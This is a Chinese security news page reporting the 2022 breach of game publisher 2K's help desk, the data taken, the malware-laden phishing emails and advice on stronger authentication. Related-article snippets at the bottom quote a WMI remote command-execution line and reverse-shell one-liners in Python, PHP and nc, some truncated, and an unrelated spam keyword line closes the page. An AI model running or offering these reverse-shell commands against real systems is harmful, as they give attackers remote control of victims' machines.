<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    游戲公司2K在技術支持部門泄密后,警告用戶信息已被竊取

    VSole2022-10-31 13:57:54

    游戲公司2K上個月遭遇了一起泄密事件,威脅分子得以獲取用戶提供給2K支持團隊的電子郵件地址、姓名及其他敏感信息,周四它警告用戶要繼續留意帳戶出現的可疑活動。

    這起泄密事件發生在9月19日,當時威脅分子非法獲得了屬于一家供應商的系統憑據,2K利用這家供應商來運行技術支持平臺。2K次日警告用戶,威脅分子使用未經授權的訪問權,向一些用戶發送含有惡意鏈接的電子郵件。該公司警告用戶不要打開其在線支持地址發送的任何電子郵件或點擊其中的任何鏈接。如果用戶已經點擊了鏈接,2K敦促他們盡快更改存儲在瀏覽器中的所有密碼。

    周四,在外部有關方完成取證分析調查工作后,2K向數量未知的用戶發送了一封電子郵件,警告威脅分子能夠獲得他們提供給技術支持人員的一些個人信息。電子郵件中寫道:

    我們在進一步調查后發現,在您聯系我們尋求支持時,未經授權的第三方訪問并復制了我們記錄的有關您的一些個人數據:聯系我們時提供的姓名、電子郵件地址、支持部門識別號、玩家代號和游戲機詳細信息。沒有跡象表明您在我們系統上保存的任何財務信息或密碼已被泄露。

    我們還發現,未經授權的第三方向某些玩家發送了含有惡意鏈接的郵件,聲稱提供來自2K的軟件更新。相反,該鏈接含有惡意軟件,可能會竊取存儲在您設備上的數據,包括密碼。

    在線常見問題解答(FAQ)顯示,沒有跡象表明在線資產受到了影響;任何收到其中一封惡意電子郵件的人都已經收到了2K的后續郵件,告知他們這一點。FAQ還表示,現在可以安全地使用在線幫助門戶網站,可以再次信任從支持地址發送的電子郵件。出于謹慎考慮,2K鼓勵所有玩家重置帳戶密碼,并確保已啟用了多因素身份驗證。

    對于Take-Two Interactive旗下的公司來說,這幾周的日子不好過。9月19日,Rockstar Games 表示遭遇了網絡入侵,入侵事件導致其爆款游戲《俠盜獵車手》下一部續集的機密開發鏡頭被盜。網上發布的數十個視頻包括大約50分鐘長的早期游戲玩法,提供了與主角有關的劇透以及期待已久的續集的設置。眾所周知,Rockstar對游戲作品的這些細節一向守口如瓶,試圖讓即將發布的版本轟動一時。

    Rachel Tobac是專注于社會工程攻擊預防的SocialProof Security公司的首席執行官,她表示,攻擊2K等公司的支持部門一向是最近泄密事件中一個反復出現的主題。比如說,2020年闖入Twitter的一群青少年發動了基于電話的網絡釣魚攻擊,盯上了這家公司的客戶支持團隊的成員,成功地誘使他們泄露了密碼和雙因素身份驗證碼。

    網絡犯罪分子在黑客攻擊活動中繼續盯上客戶支持和幫助臺憑據,因為這些角色可以訪問的管理工具非常強大,并且里面有大量敏感的用戶數據。由于這個原因,專家繼續建議升級多因素身份驗證,以便與支持部門等面向客戶的角色的威脅模型相匹配。

    許多雙因素身份驗證產品依賴通過短信(SMS)發送或由應用程序生成的一次性密碼,仍然對憑據網絡釣魚攻擊敞開大門,安全公司Twilio最近對此可謂深有體會。相比之下,基于FIDO2行業標準的雙因素身份驗證可以防范憑據網絡釣魚。盡管FIDO2是一種開放標準,適用于涵蓋諸多設備和外觀尺寸的龐大生態系統,卻仍未得到廣泛使用。

    2K今天發布的公告意味著威脅分子擁有關于特定用戶的足夠信息,可以設計出令人信服的騙局,人們可能難以識別這些騙局。面對任何聲稱與2K或游戲相關的郵件或信息,收到周四電子郵件的人都應該格外小心。

    2K建議所有用戶更改帳戶密碼也很靠譜。用戶應使用密碼管理器生成長長的隨機短語或字符串,而且是其2K帳戶所特有的。即使雙因素身份驗證產品不符合FIDO2標準,它們也提供比根本不使用雙因素身份驗證更有力的保護。

    參考及來源:

    https://arstechnica.com/information-technology/2022/10/2k-warns-users-their-info-has-been-stolen-following-breach-of-its-help-desk/

    2k
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    10月6日,2K開始聯系那些信息被竊取并被出售的客戶。
    就在 1 天前,該開發商旗下的 Rockstar 確認遭到黑客入侵,導致《GTA VI》的大量開發數據被竊取并在網絡上曝光。雖然目前并沒有證據表明本次 2K 入侵事件和此前的 Rockstar 事件存在關聯,但是這兩者均隸屬于 Take-Two Interactive。2K Games 是眾多熱門系列游戲的發行商,涵蓋體育、射擊和動作類型,包括《無主之地》、《生化奇兵》、《文明》以及 NBA 2K 和 WWE 2K 系列。總的來說,這些游戲已售出數億套:截至 2021 年,僅《NBA 2K》系列就已售出 1.12 億份。
    首先,簡單介紹一下WMI, WMI是Windows 2K/XP管理系統的核心;對于其他的Win32操作系統,WMI是一個有用的插件。WMI以CIMOM為基礎,CIMOM即公共信息模型對象管理器,是一個描述操作系統構成單元的對象數據庫,為MMC和腳本程序提供了一個訪問操作系統構成單元的公共接口。總的來說,就是一個很方便我們獲取系統信息的接口。@# process call create "cmd.exe /c whoami > c:\test.txt". 但是,目前來說這種方法存在三個缺點:1.不支持通過hash執行命令。
    在此次數據泄露事件中,NBA尚未公布泄露的數據量和涉及影響范圍。但不少粉絲稱,收到了NBA發送的“網絡安全事件通知”電子郵件,并指出NBA的系統沒有遭到破壞,數據已泄露的球迷的憑證也沒有受到影響。目前,就此次數據泄露事件,NBA已經聘請了外部網絡安全專家,以及第三方服務提供商一起,正在進行相應的調查,并分析判斷影響范圍。目前該帖子已被發布者刪除。
    2K次日警告用戶,威脅分子使用未經授權的訪問權,向一些用戶發送含有惡意鏈接的電子郵件。出于謹慎考慮,2K鼓勵所有玩家重置帳戶密碼,并確保已啟用了多因素身份驗證。
    每一個被發送出的IP信息包都有一個TTL域,該域被設置為一個較高的數值。當信息包在網絡中被傳輸時,TTL的域值通過一個路由器時遞減1;當TTL 遞減到0時,信息包被路由器拋棄。
    在用k8s時,經常會用到ingress暴露服務。 ingress可以簡單地理解成類似nginx的反向代理,可以根據配置將流量路由到不同的后端。 在"云廠商國內虛機上的k8s集群"中使用ingress會遇到兩個小問題: ingress配置中,必須使用域名,而不能使用ip 云廠商會檢查域名是否備案
    你加密的壓縮包比你想象中的還不安全! 哪怕對于信息安全人員來說,很多時候給壓縮包加上一個密碼就以為的是萬事大吉了。但事實是,很多情況下,你的加密壓縮包,遠遠沒有你想象的安全。
    在我們滲透測試的過程中,最常用的就是基于tcp/udp協議反彈一個shell,也就是反向連接。我們先來講一下什么是正向連接和反向連接。centos執行python -c 'import socket,subprocess,os;s=socket.socket;s.connect;os.dup2; os.dup2; os.dup2;p=subprocess.call;'. 這個payload是反向連接并且只支持Linux,Windows可以參考離別歌師傅的python windows正向連接后門。這樣會把目標機的/bin/bash反彈給攻擊機但是很多Linux的nc很多都是閹割版的,如果目標機器沒有nc或者沒有-e選項的話,不建議使用nc的方式.PHP攻擊機監聽nc -lvvp 4444. 要求目標機器有php然后執行php -r '$sock=fsockopen;exec;'. 加載64位的shellcode需要用64位的msbuildC:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类